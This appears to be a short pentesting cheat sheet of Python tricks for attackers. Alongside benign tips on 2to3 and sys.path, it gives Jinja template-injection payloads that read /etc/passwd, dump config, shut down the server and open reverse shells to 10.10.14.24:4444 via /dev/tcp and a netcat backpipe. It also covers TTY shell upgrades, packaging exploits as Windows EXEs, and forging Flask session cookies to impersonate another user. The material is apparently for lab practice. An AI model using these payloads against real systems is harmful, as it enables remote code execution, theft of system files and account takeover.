akde/infosec

Information security is ultimately about managing risk


Convert a Python 2 script into a Python 3 script:

2to3 -w example.py

Fix tab/space/indentation problems:

autopep8 -i linuxprivchecker.py

If a library is installed but cannot be found when importing it, e.g.

from smb.SMBConnection import SMBConnection

then search for the file locally and add its location to the module search path manually:

import sys
sys.path.append("path/to/your/file")  # the directory that contains the package

One-liner to write a Python script that spawns bash:

echo 'import os;os.system("/bin/bash")' > /tmp/e.py

Execute a command:

import os
os.system('ls -l')

__import__('os').popen('whoami').read();

os = globals()['os']  # only works if os was already imported into the module's globals
print(os.name)

Use Python scripts under Windows

If an exploit is available in Python but the target system doesn't have a Python installation, use PyInstaller on another Windows system/VM to create an EXE from the Python script. Example:

# pyinstaller --onefile windows-exploit-suggester.py

Or use https://pypi.org/project/auto-py-to-exe/

Note: In case of an error, try a newer release (pip install https://github.com/pyinstaller/pyinstaller/archive/develop.tar.gz)

Interpolation

"{name}".format(name="P")
"%s and %d" % ("string", 42)
f"User {user}" # variable user was defined before.

Jinja Template hijacking

Check whether {{ 7+3 }} is evaluated (rendered as 10) to find out if the Python application renders the input through the Jinja template engine.

{{ 7+3 }}
{{ [].__class__.__base__.__subclasses__().pop(40)('/etc/passwd').read() }}
{{ request.environ['werkzeug.server.shutdown']() }} // ...

{{ config.items() }} // Read all config variables

Example:

  1. Execute the following to get an array of available classes.
     {{ ''.__class__.__mro__[1].__subclasses__() }}

     This returns something like this:

     [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, ...

  2. Look if this includes Popen. If yes, note the index.
     In this case, we have Popen at index 407 (line 408 of the output minus 1, because indexing starts at 0).
  3. {{ ''.__class__.__mro__[1].__subclasses__()[407]("bash -i >& /dev/tcp/10.10.14.24/4444 0>&1",shell=True,stdout=-1,stderr=-1).communicate() }}
  4. {{ ''.__class__.__mro__[1].__subclasses__()[407]("mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.24 4444 1>/tmp/backpipe",shell=True,stdout=-1,stderr=-1).communicate() }}

  • https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

Flask

Flask uses a secret key to sign cookies. If you have the secret key, you can use flask-unsign to decode and re-sign a cookie you've got from the HTTP response.

The second command in this screenshot changed the id. The newly created cookie can be used in an HTTP request, which would then impersonate the user with id 20093.


python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';